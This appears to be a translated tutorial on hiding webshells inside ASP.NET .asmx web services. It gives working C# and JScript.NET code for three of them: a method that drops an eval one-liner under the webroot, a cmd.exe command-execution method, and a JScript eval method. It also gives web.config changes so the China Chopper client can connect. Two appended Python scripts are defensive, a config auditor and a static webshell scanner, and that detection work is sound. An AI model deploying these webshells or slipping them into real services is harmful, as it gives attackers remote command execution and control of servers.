Web Service is a programmable, web-based application model for building distributed, interoperable applications; it is also itself a kind of web service. Its main goal is cross-platform interoperability, and to reach that goal Web Service is built entirely on platform- and vendor-independent standards such as XML (Extensible Markup Language) and XSD (XML Schema), which makes it a new platform for creating interoperable, distributed applications. Put simply, a Web Service has three elements: SOAP (Simple Object Access Protocol), WSDL (Web Services Description Language) and UDDI (Universal Description, Discovery and Integration). SOAP describes the format of the messages exchanged, WSDL describes how to access a specific interface, and UDDI manages, publishes and looks up web services. Web Service therefore has many advantages: it works across platforms, it is simple to deploy, upgrade and maintain, and it lets multiple data sources and services be aggregated. The diagram below illustrates the Web Service workflow.
In a Web Service program, a public method that should be callable from outside must be marked with the WebMethod attribute.
This is the default web service (the HelloWorld template).

So what happens if we build our own dangerous method inside HelloWorld?
Tip 1: creating a file
<%@ WebService Language="C#" Class="WebService1" %>
using System.IO;
using System.Collections;
using System.ComponentModel;
using System.Data;
using System.Diagnostics;
using System.Web;
using System.Web.Services;
[WebService(Namespace = "http://tempuri.org/")]
[WebServiceBinding(ConformsTo = WsiProfiles.BasicProfile1_1)]
// To allow this Web Service to be called from script, using ASP.NET AJAX, uncomment the following line.
// [System.Web.Script.Services.ScriptService]
public class WebService1 : System.Web.Services.WebService
{
    public WebService1()
    {
        //
        // TODO: Add any constructor code required
        //
    }
    // WEB SERVICE EXAMPLE
    // The HelloWorld() example service returns the string Hello World.
    [WebMethod]
    public string HelloWorld(string input)
    {
        StreamWriter helloshell = File.CreateText(HttpContext.Current.Server.MapPath(input));
        helloshell.Write("<%@ WebService Language="Jscript"%><%eval(Request.Item["a"]);%>");
        helloshell.Flush();
        helloshell.Close();
        return "helloshell";
    }
}
Tip 2: a small cmd command-execution webshell (C# version)
<%@ WebService Language="C#" Class="WebService1" %>
using System.IO;
using System.Collections;
using System.ComponentModel;
using System.Data;
using System.Diagnostics;
using System.Web;
using System.Web.Services;
[WebService(Namespace = "http://tempuri.org/")]
[WebServiceBinding(ConformsTo = WsiProfiles.BasicProfile1_1)]
// To allow this Web Service to be called from script, using ASP.NET AJAX, uncomment the following line.
// [System.Web.Script.Services.ScriptService]
public class WebService1 : System.Web.Services.WebService
{
    public WebService1()
    {
        //
        // TODO: Add any constructor code required
        //
    }
    // WEB SERVICE EXAMPLE
    // The HelloWorld() example service returns the string Hello World.
    [WebMethod]
    public string HelloWorld(string input)
    {
        Process oci = new Process();
        oci.StartInfo.FileName = "cmd.exe";
        oci.StartInfo.RedirectStandardOutput = true;
        oci.StartInfo.UseShellExecute = false; // redirect the I/O stream
        oci.StartInfo.Arguments = "/c" + input;
        oci.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
        oci.Start();
        StreamReader txt = oci.StandardOutput;
        string alltxt = txt.ReadToEnd();
        txt.Close();
        txt.Dispose(); // release resources
        return alltxt;
    }
}

Tip 3: building a one-liner that China Chopper (Caidao) can connect to
Note that Chopper passes its parameters as GET/POST values rather than calling over the SOAP protocol, so to build a Chopper-compatible .asmx one-liner, web.config must be configured as follows:
<?xml version="1.0" encoding="utf-8"?>
<!--
  For more information on how to configure your ASP.NET application, please visit
  https://go.microsoft.com/fwlink/?LinkId=169433
-->
<configuration>
  <system.web>
    <webServices>
      <protocols>
        <add name="HttpPost"/>
        <add name="HttpGet"/>
      </protocols>
    </webServices>
    <compilation debug="true" targetFramework="4.0" />
    <customErrors mode="Off"/>
  </system.web>
</configuration>
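As an added example (not part of the original post), the following Python script audits a web.config for exactly the settings shown above. It replays the add/remove/clear entries under system.web/webServices/protocols and flags HttpGet and HttpPost when they end up enabled: ASP.NET has disabled both for remote callers since version 1.1, leaving only HttpPostLocalhost on, so a file that re-adds them is a finding in its own right. It also flags debug="true" and customErrors mode="Off". Both embedded configurations are constructed: the first mirrors the snippet above, the second is a hardened counterpart that uses <remove> entries, disables debug and shows detailed errors only locally. The function names are my own.

```python
"""Audit an ASP.NET web.config for the settings the post relies on.

Added example, not code from the original post. Only the protocol entries
in this file are replayed; entries inherited from machine.config
(HttpSoap, HttpSoap12, HttpPostLocalhost, Documentation) are not modelled.
"""
import xml.etree.ElementTree as ET
from typing import List, Set

# Constructed: the configuration from the post (comment omitted).
WEAK_CONFIG = """<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <system.web>
    <webServices>
      <protocols>
        <add name="HttpPost"/>
        <add name="HttpGet"/>
      </protocols>
    </webServices>
    <compilation debug="true" targetFramework="4.0" />
    <customErrors mode="Off"/>
  </system.web>
</configuration>
"""

# Constructed: a hardened counterpart. <remove> undoes any inherited <add>,
# debug is off, and detailed errors are only shown on the server itself.
HARDENED_CONFIG = """<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <system.web>
    <webServices>
      <protocols>
        <remove name="HttpPost"/>
        <remove name="HttpGet"/>
      </protocols>
    </webServices>
    <compilation debug="false" targetFramework="4.0" />
    <customErrors mode="RemoteOnly"/>
  </system.web>
</configuration>
"""


def enabled_protocols(root: ET.Element) -> Set[str]:
    """Replay add/remove/clear under system.web/webServices/protocols in order."""
    enabled: Set[str] = set()
    protocols = root.find("./system.web/webServices/protocols")
    if protocols is None:
        return enabled
    for el in protocols:
        name = el.get("name")
        if el.tag == "add" and name:
            enabled.add(name)
        elif el.tag == "remove" and name:
            enabled.discard(name)
        elif el.tag == "clear":
            enabled.clear()
    return enabled


def audit_web_config(xml_text: str) -> List[str]:
    """Return human-readable findings; an empty list means nothing was flagged."""
    root = ET.fromstring(xml_text.encode("utf-8"))
    findings: List[str] = []
    enabled = enabled_protocols(root)
    for proto in ("HttpGet", "HttpPost"):
        if proto in enabled:
            findings.append(f"{proto} enabled: WebMethods reachable with plain "
                            f"query-string/form parameters, not only SOAP")
    comp = root.find("./system.web/compilation")
    if comp is not None and comp.get("debug", "").lower() == "true":
        findings.append("compilation debug=true")
    errs = root.find("./system.web/customErrors")
    if errs is not None and errs.get("mode", "").lower() == "off":
        findings.append("customErrors mode=Off: detailed errors sent to remote clients")
    return findings


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(label, audit_web_config(cfg) or ["no findings"])
```

Run against a real deployment, the same check belongs in a configuration review of every web.config in the webroot, since a nested directory can re-enable the protocols that the site root disabled.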
Next, build the JScript.NET one-liner for Chopper:
<%@ WebService Language="JScript" Class="WebService1" %>
import System;
import System.Web;
import System.IO;
import System.Web.Services;
import System.Web.Script.Services;
public class WebService1 extends WebService
{
    WebMethodAttribute ScriptMethodAttribute function Cmdshell(Pass : String) : Void
    {
        var c = HttpContext.Current;
        var Request = c.Request;
        var Response = c.Response;
        eval(Pass);
    }
}
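Added example (not code from the original post): all three tips leave an .asmx file whose source contains a recognisable sink, so a defender triaging a copied webroot can flag them statically. The script below is my own; rule names, function names and the four embedded .asmx snippets are constructed test inputs modelled on the patterns in tips 1 to 3 (a benign HelloWorld, a cmd.exe spawner, a Server.MapPath file dropper and a JScript.NET eval() method). Each rule requires several regexes to match the same file, which keeps a single keyword such as "Process" from raising an alert on its own.

```python
"""Static triage of ASP.NET .asmx sources for the webshell patterns above.

Added example, not code from the original post. Intended for offline
triage of a copied webroot; every rule is a set of regexes that must ALL
match the same file (AND semantics).
"""
import re
from typing import Dict, List

# Rule name -> regexes that must all match.
RULES: Dict[str, List[re.Pattern]] = {
    # Tip 3 pattern: a JScript.NET service whose method eval()s its argument.
    "jscript-eval": [
        re.compile(r'<%@\s*WebService[^%]*Language\s*=\s*"JScript"', re.I),
        re.compile(r"\beval\s*\("),
    ],
    # Tip 2 pattern: a Process pointed at cmd.exe or built with a "/c" argument.
    "command-exec": [
        re.compile(r"\bProcess\b"),
        re.compile(r'cmd\.exe|StartInfo\.Arguments\s*=\s*"/c', re.I),
    ],
    # Tip 1 pattern: a file created under the webroot via Server.MapPath()
    # whose content (a string literal) contains server-side script tags.
    "script-dropper": [
        re.compile(r"File\.(CreateText|WriteAllText|AppendAllText)|new\s+StreamWriter", re.I),
        re.compile(r"Server\.MapPath\s*\("),
        re.compile(r'"[^"\n]*<%'),
    ],
}

# A method is reachable over HTTP only when marked [WebMethod] (C#) or
# WebMethodAttribute (JScript.NET attribute syntax).
EXPOSED = re.compile(r"\[\s*WebMethod\b|\bWebMethodAttribute\b")

# Constructed sample inputs (hypothetical file names, minimal bodies).
SAMPLES: Dict[str, str] = {
    "benign.asmx": '''<%@ WebService Language="C#" Class="Greeter" %>
using System.Web.Services;
public class Greeter : WebService {
    [WebMethod] public string Hello(string name) { return "Hello " + name; }
}''',
    "exec.asmx": '''<%@ WebService Language="C#" Class="WebService1" %>
using System.Diagnostics;
using System.Web.Services;
public class WebService1 : WebService {
    [WebMethod] public string HelloWorld(string input) {
        Process p = new Process();
        p.StartInfo.FileName = "cmd.exe";
        p.StartInfo.Arguments = "/c " + input;
        return "";
    }
}''',
    "drop.asmx": '''<%@ WebService Language="C#" Class="WebService1" %>
using System.IO;
using System.Web;
using System.Web.Services;
public class WebService1 : WebService {
    [WebMethod] public string HelloWorld(string input) {
        StreamWriter w = File.CreateText(HttpContext.Current.Server.MapPath(input));
        w.Write("<% ... %>");
        w.Close();
        return "ok";
    }
}''',
    "eval.asmx": '''<%@ WebService Language="JScript" Class="WebService1" %>
import System.Web.Services;
public class WebService1 extends WebService {
    WebMethodAttribute function Cmdshell(Pass : String) : Void { eval(Pass); }
}''',
}


def scan_asmx_source(text: str) -> List[str]:
    """Return the names of every rule whose regexes all match `text`."""
    return [name for name, pats in RULES.items() if all(p.search(text) for p in pats)]


def is_exposed(text: str) -> bool:
    """True if the source declares at least one externally callable WebMethod."""
    return EXPOSED.search(text) is not None


def triage(files: Dict[str, str]) -> Dict[str, List[str]]:
    """Map file name -> findings for every file that has at least one."""
    report: Dict[str, List[str]] = {}
    for name, src in files.items():
        hits = scan_asmx_source(src)
        if hits:
            report[name] = hits
    return report


if __name__ == "__main__":
    for fname, hits in triage(SAMPLES).items():
        print(f"{fname}: {', '.join(hits)} (exposed={is_exposed(SAMPLES[fname])})")
```

The rules are deliberately narrow so they can run over a whole webroot without drowning in noise; a real review would pair them with file-timestamp and IIS-log correlation, since a freshly created .asmx that receives POSTs with form parameters rather than SOAP envelopes is the behavioural counterpart of what the config change in tip 3 enables.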


